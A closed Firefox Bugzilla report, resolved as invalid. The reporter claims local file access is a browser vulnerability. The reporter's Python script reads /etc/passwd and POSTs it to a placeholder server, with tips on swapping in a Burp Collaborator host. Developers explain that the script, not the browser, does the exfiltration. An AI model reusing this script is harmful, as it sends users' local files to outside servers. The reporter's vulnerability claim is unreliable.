Closed Bug 1863921 Opened 2 years ago Closed 1 year ago

firefox.com - Possible security breach regarding local files

Categories

(Core :: Security, defect)

Desktop
Linux
defect

RESOLVED INVALID

People

(Reporter: rbucata, Unassigned)

Details

From github: https://github.com/webcompat/web-bugs/issues/129470.

<!-- @browser: Firefox 115.0 -->
<!-- @ua_header: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 -->
<!-- @reported_with: unknown -->

URL: https://firefox.com

Browser / Version: Firefox 115.0
Operating System: Linux
Tested Another Browser: Yes Chrome

Problem type: Something else
Description: Found a unique way to trigger LFI to my server from any user of Mozilla Firefox
Steps to Reproduce:
I found a unique way to trigger LFI in the browser, where a user can simply:

open Chrome
now paste file:///etc/passwd in the search bar
you get the local file in your browser

Now, to show impact, I created a code which allows an attacker to steal a local file onto their own server. If a user starts this code in a terminal, Firefox automatically gives them the /etc/passwd content on their server.

<details>
<summary>View the screenshot</summary>
<img alt="Screenshot" src="https://webcompat.com/uploads/2023/11/c21d99b6-5e8c-466e-9e55-e131e1d6e1e7.jpg">
</details>

<details>
<summary>Browser Configuration</summary>
<ul>
<li>None</li>
</ul>
</details>

From webcompat.com with ❤️

Change performed by the Move to Bugzilla add-on.

The issue was reported via the webcompat.com reporter. Since the issue is related to a possible security breach in most of the browsers, as local files can be accessed as the reporter states using a code command, we have moved the issue. Please feel free to move the issue to the correct Product and Component.

OS: Android → Linux
Hardware: Unspecified → Desktop

You're welcome. Where do I report this? I know only this place to report any bug. Help me report it in the correct place.

Group: dom-core-security
Group: dom-core-security → core-security-release

Here's the rest of the comments from GitHub. I edited a bit to hopefully fix up the markup.

This is the code which allows an attacker to get the content of /etc/passwd to a Burp Collaborator server:

import os
import subprocess
import requests

def open_chrome_and_execute_command(command):
    """Opens Firefox in a new private window on the given URL.
    (The function name says Chrome, but the binary launched is firefox;
    Chrome's --incognito flag is replaced by Firefox's --private-window.)"""
    subprocess.Popen(['firefox', '--private-window', '--new-window', command])

def send_response_data_to_server(response_data, server_url):
    """Sends the response data to the given server."""
    requests.post(server_url, data=response_data)

if __name__ == '__main__':
    # Open Firefox on the local file.
    open_chrome_and_execute_command('file:////etc/passwd')

    # Read the file straight from disk; the browser plays no part in this step.
    response_data = subprocess.check_output(['cat', '/etc/passwd'])

    # Send the file content to the server.
    send_response_data_to_server(response_data, 'http://example.com/api/v1/response-data')

In here you can change "subprocess.Popen(['firefox', ..." (the rest remains the same), and in

send_response_data_to_server(response_data, 'http://example.com/api/v1/response-data') you can set your Collaborator server here and get an HTTP ping back with the user's /etc/passwd on your server.

Why is it necessary to run a browser here? Can't you just already run cat on etc/passwd? If you can already trick somebody into running arbitrary commands locally I don't see how that's something the browser can do anything about.

Flags: needinfo?(chikusoni9249)

How can the browser access my /etc/passwd without my permission? This is a security issue. If I try another payload the browser throws an error, so why is /etc/passwd allowed?

Flags: needinfo?(chikusoni9249)

And because you can also just type file:////etc/passwd in your browser and you can see it there...
As for the impact, you can see the above code and there "send_response_data_to_server(response_data, 'http://example.com/api/v1/response-data')". Here is the trick: if the user runs this command, the attacker gets a ping from the browser and gets the content of /etc/passwd on the attacker's side.

You can simply change example.com to a Burp Collaborator and see this happen.

The browser itself can access any file you, the person logged into the computer, can see. If file:///etc/passwd shows you the password file it's because the OS permissions are set to let you read that file.

Web pages on the internet cannot read that file, only you, explicitly opening that file, can cause it to be loaded. Of course every other program you run on your machine can do what you can do, so if those programs are controlling Firefox then they can make Firefox open that file. I don't know what the commands are in comment 3 but I assume they are some kind of automation framework running locally. That script is explicitly capturing browser content and sending it to your collector. Web content cannot do that. The locally-running script is responsible, and it doesn't need to use Firefox to access and post that file content.
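To make the two-part rule in the reply above concrete, here is an added illustration (not Gecko's code and not the reporter's script): a simplified model in which a file: URL is served only for a user-typed navigation or a local initiator, and then only if Unix permissions let the logged-in user read the file. The modes 0644/0640, the shadow group id 42, uid 1000 and the site.example origin are constructed values.

```python
import stat
from urllib.parse import urlsplit

# Constructed model, not Gecko's content-policy code: a file: URL is loaded
# only for a user-typed navigation or a local initiator, and even then only
# if Unix permissions let the logged-in user read the file.
LOCAL_SCHEMES = {"file"}
WEB_SCHEMES = {"http", "https"}

def os_allows_read(mode, file_uid, file_gid, uid, gids):
    """Unix read check: root always; otherwise owner, group, then other bit."""
    if uid == 0:
        return True
    if uid == file_uid:
        return bool(mode & stat.S_IRUSR)
    if file_gid in gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)

def browser_may_load(target_url, initiator_url=None):
    """initiator_url=None means the user typed the URL into the address bar.

    A document served from http(s) never gets file: content; a local
    document may. Web targets are reachable from anywhere in this model.
    """
    target = urlsplit(target_url).scheme.lower()
    if initiator_url is None:
        return target in LOCAL_SCHEMES | WEB_SCHEMES
    initiator = urlsplit(initiator_url).scheme.lower()
    if target in LOCAL_SCHEMES:
        return initiator in LOCAL_SCHEMES
    return target in WEB_SCHEMES

def file_url_exposes(target_url, initiator_url, mode, file_uid, file_gid, uid, gids):
    """Full decision: scheme policy first, then OS permissions for file: targets."""
    if not browser_may_load(target_url, initiator_url):
        return False
    if urlsplit(target_url).scheme.lower() not in LOCAL_SCHEMES:
        return True
    return os_allows_read(mode, file_uid, file_gid, uid, gids)

if __name__ == "__main__":
    # Constructed: /etc/passwd 0644 root:root, /etc/shadow 0640 root:shadow (gid 42), user uid 1000.
    me = (1000, {1000})
    print(file_url_exposes("file:///etc/passwd", None, 0o644, 0, 0, *me))                    # True
    print(file_url_exposes("file:///etc/passwd", "https://site.example/", 0o644, 0, 0, *me))  # False
    print(file_url_exposes("file:///etc/shadow", None, 0o640, 0, 42, *me))                    # False
```

The third case is why "other payloads" fail for the reporter: the browser is simply relaying the OS permission denial, not applying a list of allowed files.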

Status: NEW → RESOLVED
Closed: 1 year ago
Resolution: --- → INVALID
Group: core-security-release